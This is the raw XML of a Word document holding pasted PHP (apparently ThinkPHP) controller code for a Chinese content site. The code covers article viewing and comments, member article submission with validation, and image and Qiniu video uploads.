    <w:p w14:paraId="226AC9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$name['type_name'] = Db::name('typeid')-&gt;where(['id'=&gt;$name['typeid']])-&gt;cache(true)-&gt;value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C520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684EB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$name['type_name'] = Db::name('mychannel')-&gt;where(['id'=&gt;$name['mychannel']])-&gt;cache(true)-&gt;value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544820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1CED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Db::name('article')-&gt;where(['id'=&gt;$id,'hide'=&gt;1])-&gt;setInc('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D782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if($name['content']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C4DB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preg_match_all("/img(.*?)src=\"(.*?)\"/", stripslashes($name['content']),$content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F12E3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($content[2] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B9D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if(strstr($v,'http')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F755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if(strpos($v,'/public/uploads/us/') !== false){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D45C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1EEF3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$name['content']=str_replace($v,_imgUrl().$v,stripslashes($name['content']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3709C9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D84B2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C89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5025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if($name['mychannel']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C9E5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p>
    <w:p w14:paraId="6D81E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$imagsjson = json_decode($name['images'],true) ? json_decode($name['images'],true) : json_decode(htmlspecialchars_decode($name['images']) , true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2501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($imagsjson as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A69A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$content.='&lt;p class="a-image"&gt;&lt;img src="'._imgUrl().(!empty($v['img']) ? $v['img'] : $v).'"&gt;&lt;/p&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C89C7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if(!empty($v['img_text'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF1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$content.='&lt;p class="a-image"&gt;'.$v['img_text'].'&lt;/p&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B59D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6E6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0E1D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$name['content']="&lt;p&gt;".$name['description']."&lt;/p&gt;".$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559A3A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if($name['mychannel']==3 || $name['mychannel']==4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C827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if($name['mychannel']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A6F4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$videoimages=$name['image'] ? $name['image'] : $name['video']."?vframe/jpg/offset/2/w/400/h/400";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D113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68C17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$videoimages=$name['image'] ? $name['image'] : $name['video']."?vframe/jpg/offset/2/w/400/h/700";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606F3C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827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$videoimages=_imgUrl().$videoimages;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A7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$this-&gt;assign('videoimages',$videoimages);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180A9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E909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$user=Db::name('member')-&gt;where('id',$name['uid'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1FA3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$typeid=Db::name('typeid')-&gt;where(['hide'=&gt;1,'tid'=&gt;0])-&gt;order('hide desc,des desc')-&gt;limit(100)-&gt;cache(_cache('db'))-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC066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622618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$this-&gt;assign('user',$user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86A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if(_session()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2C8D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$shoucang=DB::name('member_favorite')-&gt;where(['aid'=&gt;$id,'uid'=&gt;$name['uid'],'type'=&gt;0])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A457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if(!$shoucang){$shoucang=0;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4685C6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$name['guanzhu']=db('member_guanzhu')-&gt;where(['uid'=&gt;$member['id'],'gz_uid'=&gt;$name['uid']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15123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7B3FC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$shoucang=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED8C4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$name['guanzhu']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF75D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CEE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$name['shoucang']=$shoucang;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6587CF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$ping=Db::name('article_ping')-&gt;where('aid',$id)-&gt;order('time desc')-&gt;limit(10)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263B3B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 as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4955EE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$user=_user($v['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A560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$ping[$k]['img']=_imgUrl().$user['img']."?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637090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$ping[$k]['username']=$user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70536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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF83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$member['id']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB53C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$zanUser = Db::name('article_ping_zan')-&gt;where(['pingId' =&gt; $v['id'], 'uid' =&gt; $uid])-&gt;cache(_cache('db'))-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DCD2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$ping[$k]['zanUser'] = $zanUser;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7091F5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85DB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415B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$name['content']=str_replace('&lt;div&gt;','',$name['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226957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$this-&gt;assign('ping',$ping);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3B5F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06D951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$this-&gt;fetch('view');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2B33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5BC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page(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4955A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757DD6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790F5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F39F9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2B30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$typeid=Db::name('typeid')-&gt;where(['hide'=&gt;1,'tid'=&gt;0])-&gt;order('hide desc,des desc')-&gt;limit(100)-&gt;cache(_cache('db'))-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E4AE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$typeidJosn=[];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FFAC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($typeid as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F857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$typeidJosn[$k]['name']=$v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7976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$typeidJosn[$k]['channelid']=$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B92E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$typeidJosn[$k]['url']=url('typeid',['id'=&gt;$v['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664108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FB8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$this-&gt;assign('typeidJosn',$typeidJosn);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382DE2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535B06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$name=Db::name('page')-&gt;where('id',$id)-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A1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2D3D5E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671D6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35D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search(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459449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$search=input('search');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C357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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35088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请输入搜索关键词</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364D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D80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$typeid=Db::name('typeid')-&gt;where(['hide'=&gt;1,'tid'=&gt;0])-&gt;order('hide desc,des desc')-&gt;limit(100)-&gt;cache(_cache('db'))-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131FD1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46B5A5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$this-&gt;assign('search',$search);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A36B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56D1B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D07B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A22F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B843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app\index\controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D79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app\index\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F223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6F5288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4C40FF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748DF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04628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 as Auth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5372B3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7266ED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set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B3E6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Mp extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D8A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1904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$member=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF0D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__construct(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E394D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parent::__construct();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7756F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if(!Session::has('user','ffxiangUser')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4839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$this-&gt;redirect("user/login");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CEC6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7EADDB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_member();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4D1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$this-&gt;assign('member',$this-&gt;member);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA9EC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04F2C3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7041B3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$article_num = Db::name('article')-&gt;where(['uid'=&gt;$this-&gt;member['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2380C4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$this-&gt;assign('article_num',$article_num);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFEB3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$article_ping = Db::name('article_ping')-&gt;where(['aid_uid'=&gt;$this-&gt;member['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3413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$this-&gt;assign('article_ping',$article_ping);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE408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$article_zan = Db::name('article_zan')-&gt;where(['aid_uid'=&gt;$this-&gt;member['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1615AE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$this-&gt;assign('article_zan',$article_zan);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D9B4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2E2F4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CD82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add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321032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 input('mychannel/d') ? input('mychannel/d') : 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325F38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$this-&gt;assign('mychannel',$mychannel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0F5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0A9A1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536FE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0748E5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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标题</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'    =&gt;      'require|length:5,100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12969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内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'  =&gt;      'length:100,9999',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357BC4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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'=&gt;      'require|number|in:1,2,3,4,5',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681ED9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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'   =&gt;      'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02999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F73D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF5C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$post['title'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E31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$post['content'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0552AA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=&gt;      $post['mychannel'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F67A2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=&gt;      $post['typeid']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CFDA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0656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6823E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json(['err'=&gt;$validate-&gt;getError()]);;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457EF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F4C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 == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C5E7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if(!$post['content']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A63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内容不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDB2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AD5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if($mychannel == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AA4C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if(!$post['images']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E398B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图片不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B9EF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2C54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if($mychannel == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B67D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if(!$post['video']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F06C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视频不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4254E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4BED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DC44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$mychannel_db = Db::name('mychannel')-&gt;cache(true)-&gt;find($mychannel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414DCF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if(!$mychannel_db){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6129E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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模型</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A4D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2A60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47D7A4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$title_where['title'] = $post['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DCEC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46ED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$title_where['id'] = ['&lt;&gt;',$id];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96F5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487D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Db::name('article')-&gt;where($title_where)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FF28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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB1CE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标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463D7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2390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2F7E10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$where['title']         =   $post['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123E84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372F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$where['create_time']   =   $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C029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0C4C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$where['update_time']   =   $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E8B2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$where['des']           =   50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0DCE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2B60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3CA06A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1559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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24A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$post['mychannel'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2744B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136BE5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$where['source']        =   $this-&gt;member['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5FD5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         =   $post['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5090D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$where['typeid']        =   $post['typeid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0A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 == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590C70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       =   $post['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4A3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}elseif($mychannel == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3395F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$where['images']        =   json_encode($post['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8AFF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if($mychannel == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617AD3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$where['video']         =   $post['video'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A61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4C8F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9319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Db::name('article')-&gt;insertGetId($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBDF1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AD7D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json(['ret'=&gt;$id]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062B25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04F5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添加失败，请联系管理员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F17E6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FBE8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51382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Db::name('article')-&gt;where(['id'=&gt;$id,'uid'=&gt;$this-&gt;member['id']])-&gt;update($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388C74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F543C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json(['ret'=&gt;$id]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA59D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5A21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修改失败，请联系管理员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637F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032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5286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11A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 == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217806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Db::name('typeid')-&gt;where(['hide'=&gt;1,'tid'=&gt;0,'tid'=&gt;132])-&gt;order('des desc')-&gt;cache(true)-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148B90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93F2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Db::name('typeid')-&gt;where(['hide'=&gt;1,'tid'=&gt;0,'id'=&gt;['&lt;&gt;','132']])-&gt;order('des desc')-&gt;cache(true)-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FC8F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260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38DF1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12BD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Db::name('article')-&gt;where(['uid'=&gt;$this-&gt;member['id']])-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA77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35785C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文章不存在或已删除！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C51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46BD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4DD069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5EE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$this-&gt;assign('id',$id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062BA5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$this-&gt;assign('typeid',$typeid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E5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C27D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86E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upload(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BB3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request()-&gt;file('file');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4776B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319ECE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if(!$filePath){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3467B5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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099D1A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1A9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771D7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$geshi=['jpg','png','gif','jpeg','JPEG','JPG','GIF','PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E34B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if(!in_array($ext,$geshi)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE6D0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33CA28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8DD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=substr(md5($file-&gt;getRealPath()) , 0, 5). date('YmdHis') . rand(100, 999999) . '.jpg' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759840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6CDCEB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725434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236447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590677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68177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67842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549F5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00458B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07131D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036892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$a['code'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC4B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$a['msg']   =   $err;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018558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3A166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$a['code'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1E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$a['msg']   =   '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23067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$a['data']['src']   =   _imgUrl().$ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A089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$a['data']['src_s']   =  $ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E1E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$a['data']['title'] =   '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C35F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2DA1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA4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8E93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upload_video(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC00C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38B8CA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db::name('member_config')-&gt;where(['type'=&gt;'sdkQiniu'])-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24470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5414A4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36E517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0DCB1D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443B3B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$pipeline = $db['4']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7294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$db['5']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B6AD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50340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$savekey = \Qiniu\base64_urlSafeEncode($bucket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D510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$fops.'|saveas/'.$savekey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E2D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$wenurl=config()['appConfig']['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C738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$policy = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CB38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'persistentOps' =&gt; $fops,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3B0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'persistentPipeline' =&gt; $pipeline,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A862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'persistentNotifyUrl' =&gt; $wenurl.'/index.php/api/index/notify',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E60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79D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$uptoken = $auth-&gt;uploadToken($bucket, null, 3600, $policy);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69848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request()-&gt;file('file');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75CF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4B9E6C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17B744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$uploadMgr-&gt;putFile($uptoken, null, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBF3B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7F67FB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$a['code'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320A2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$a['msg']   =   $err;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2602EC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9344B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$a['code'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463A2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$a['msg']   =   '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F92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$a['data']['src']   =   _imgUrl().$ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BD3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$a['data']['src_s']   =  $ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109CC1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$a['data']['title'] =   '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BBA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$a['data']['persistentId'] = $ret['persistentId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0240FC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148C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396F0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C1F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5123A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 input('mychannel/d') ? input('mychannel/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA218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$this-&gt;assign('mychannel',$mychannel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688143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 = input('hide/d') ? input('hide/d') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4210E9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$this-&gt;assign('hide',$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE82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6E1A53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['&lt;&gt;',4];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EFC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$where['qiniu_video_type'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F55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['in','0,1,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E67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if($hide){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790E1D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$hide;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F44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4653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 = Db::name('article')-&gt;where($where)-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB2F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$this-&gt;assign('count',$count);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398AD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$this-&gt;fetch('list');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC162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E539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comment(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB3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$where['aid_uid']   =   $this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CA21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 = Db::name('article_ping')-&gt;where($where)-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F73F3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$this-&gt;assign('count',$count);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E48EB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E7D4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7DAD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6E55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2DA1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C930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img(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544AE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$size = input('size') ? input('size') : '300';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EFC6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'http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA66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getimagesize($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3AD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$imgExt = image_type_to_extension($info[2], false);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE022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$fun = "imagecreatefrom{$imgExt}";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A208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$imgInfo = $fun($img);                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A0D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$mime = $info['mime'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7364E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$mime = image_type_to_mime_type(exif_imagetype($img)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D01B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header('Content-Type:'.$mime);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC367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$quality = 100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455A69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if($imgExt == 'png') $quality = 9;        </w:t>
      </w:r>
    </w:p>
